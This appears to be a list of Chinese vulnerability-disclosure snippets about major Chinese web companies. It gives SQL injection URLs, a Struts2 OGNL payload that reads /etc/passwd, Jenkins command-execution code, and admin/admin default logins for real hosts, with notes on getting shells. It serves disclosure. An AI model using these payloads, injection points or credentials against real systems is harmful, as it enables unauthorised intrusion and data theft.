迅雷某分站SQL注入Root权限可Getshell,可登后台可脱库 注入点:http://mac.xunlei.com/app/soft/details.php?soft_id=1140 Root权限哦,读取passwd 数据库连接信息 登陆后台
Struts2最近问题频发,各大互联网大厂纷纷躺枪,这不TOM也来了~ 这次发现漏洞的站点是“TOM音乐互联”,好像是个废弃站点~ Struts2未升级,导致可Getshell 链接:http://211.100.40.155/website/applyCollectWebsite.action Getshell,如图
之前猪猪侠大牛爆的WordPress遍览用户的漏洞,一直想找个站点练练手,今天又在drops看到了利用脚本,于是就有了下文~ 因为本菜鸟主要是做前端的,所以经常光顾各大企业UED学习,发现几乎90%以上的UED站都是WordPress 搭建的,So,那就从UED开始吧~ 以下为常见互联网大厂UED系统: http://ued.sina.com.cn/ http://udc.weibo.com ht…
1、注入点:http://sms.tom.com/pk12530/ub/news_admin/index.php?id=18 ,如图 2、注入点:http://m.tom.cn/appweb/book/xiazai.jsp?s=116 ,如图
网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
http://220.181.109.120:8080/ Jenkins平台,未授权访问,应该是奇艺的,看图: 还可以直接执行命令呢,继续深入的话可渗透内网(未授权不敢测试) Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); Buffered…
注入点: http://dota2db.games.sina.com.cn/?a=hero_info&id=10487
http://b131.demo.www.net.cn/admin/login.aspx 万网分销宝系统 用户名密码都是admin,进入后台可得shell ,如图 菜刀连接 同服很多分站,貌似都是测试模板
http://123.126.55.209:8000/ 新浪云主机托管平台SWS Service 用户名:admin 密码:admin 用火狐登陆进去可以点击查看相关信息,如图
1、SQL注入 http://minisite.163.com/2006/0615/abbott/page09.php?userID=209 ,如图 2、爆路径 3、列目录 http://cms.netease.com:9039/